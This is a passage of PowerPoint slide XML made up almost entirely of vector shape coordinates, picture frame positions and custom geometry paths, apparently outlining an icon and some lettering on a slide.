                    <a:pt x="2826828" y="800323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="695758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822807" y="663584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2818786" y="635432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2810744" y="607280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2802701" y="583150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794659" y="554997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770533" y="498693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746406" y="450433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730322" y="426302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714237" y="406194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698153" y="382063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2678047" y="361955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661963" y="341846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641858" y="321737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2621752" y="305651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2601647" y="285542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2553394" y="253368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2481014" y="217173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2428740" y="197064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372444" y="180977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2288001" y="168912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2259854" y="168912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2207580" y="172934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159326" y="176955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111073" y="193042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2062820" y="205107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974356" y="245325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938166" y="273477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1897955" y="301629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1857744" y="237281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1833618" y="209129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809491" y="176955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1753196" y="128695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721027" y="104564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1684837" y="80434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648648" y="64347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1616479" y="48260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1576268" y="32173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1540078" y="20108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1499867" y="8043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1419445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D6829064-CA2D-AC98-337D-B3946DF2C28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480" y="2347164"/>
              <a:ext cx="3188726" cy="1998797"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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C69561DD-2544-62D0-CC99-AC02D4B118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932" y="2272356"/>
              <a:ext cx="3434120" cy="2222500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6E4CC1BC-2233-E9C7-6DDE-283D4EB730A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5232" y="2819638"/>
              <a:ext cx="650987" cy="957580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2178AA1A-D469-BFF8-E007-27703291687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6405" y="3394443"/>
              <a:ext cx="372321" cy="372110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5BC8B91C-73B2-280D-923C-4FEC4C6CB5F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1248" y="3888236"/>
              <a:ext cx="984181" cy="94487"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5F36A2F5-4051-82F4-0533-4332B9B3B18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72802" y="3103367"/>
              <a:ext cx="414022" cy="612559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65EB9811-3432-453E-9DEE-A2689872B48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0737" y="3134320"/>
              <a:ext cx="353019" cy="561923"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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1CD1B26E-2C7A-79C6-4553-3A03E921FC7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4175391" y="3096538"/>
              <a:ext cx="431165" cy="618490"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="370151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="591119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61924" y="618015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143882" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65793" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61511" y="602826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63726" y="602429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26322" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51162" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368774" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366940" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410973" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370151" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="63726" y="602429"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61511" y="602826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65793" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63726" y="602429"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415845" y="539324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="63726" y="602429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65793" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143882" y="603327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="551906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="539324"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="10446" y="579287"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579287"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="581247"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26322" y="586183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581247"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="579287"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10446" y="579287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="581247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="579287"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="422007" y="538220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="539324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422007" y="538220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430803" y="538220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422007" y="538220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="545616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="538220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415845" y="32542"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="539324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422007" y="538220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="538220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="32542"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="14958" y="77147"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8757" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="78228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="51162" y="70836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51162" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415845" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430803" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415845" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="410973" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="366940" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370750" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368774" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415845" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430803" y="21996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410973" y="14804"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="366940" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="368774" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370750" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366940" y="14804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257D0532-D9D7-AA27-0AEE-8D82E10B704A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4108729" y="3689588"/>
              <a:ext cx="573405" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="573404" h="155575">
                  <a:moveTo>
                    <a:pt x="573028" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573028" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573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FB30BA76-E002-B235-4362-8DBBE94938A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4120230" y="3720109"/>
              <a:ext cx="551180" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="64760" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61732" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61732" y="38364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="38364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23185" y="21559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64760" y="21559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64760" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="103957" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82052" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82052" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103957" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103957" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="104567" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81443" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81443" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104567" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104567" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="147727" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="125822" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125822" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="48808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150470" y="47833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153031" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157786" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175220" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168273" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170851" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172355" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173384" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175220" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="165882" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163800" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156709" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152523" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147727" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175220" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="223216" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="187087" y="45641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184507" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185189" y="68799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208967" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209178" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217199" y="95679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226854" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232157" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236994" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245731" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250385" y="92597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221936" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216430" y="79491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208952" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206920" y="69737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206595" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256603" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256603" y="56753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256320" y="52763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256238" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206534" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206842" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206859" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208362" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213712" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217242" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252159" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251888" y="37236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248231" y="32572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243525" y="28892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237789" y="26263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231411" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232372" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223216" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="255322" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="252904" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250385" y="74980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246971" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238314" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233844" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255322" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="252159" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="225980" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229333" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233620" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234678" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234758" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234880" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256238" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256077" y="49323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254690" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254616" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254504" y="42819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252159" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="289826" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266905" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287855" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311264" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317600" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301530" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289826" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="341969" y="48503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="325000" y="48503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338879" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362064" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368636" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349262" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341969" y="48503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="335424" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="316080" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301530" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317600" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325000" y="48503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341969" y="48503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335424" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="383197" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="360764" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349262" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368636" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383197" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462550" y="39339"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429060" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433591" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439728" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441272" y="45516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441272" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434831" y="50007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428633" y="50576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394780" y="69920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394832" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396974" y="86237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405911" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406210" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411137" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420342" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422882" y="96031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441150" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462812" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425829" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423817" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421216" y="80487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420119" y="79897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419184" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418209" y="78292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417599" y="77439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417111" y="75671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416990" y="70957"/>
                  </a:lnTo>
                  <a:lnTo>
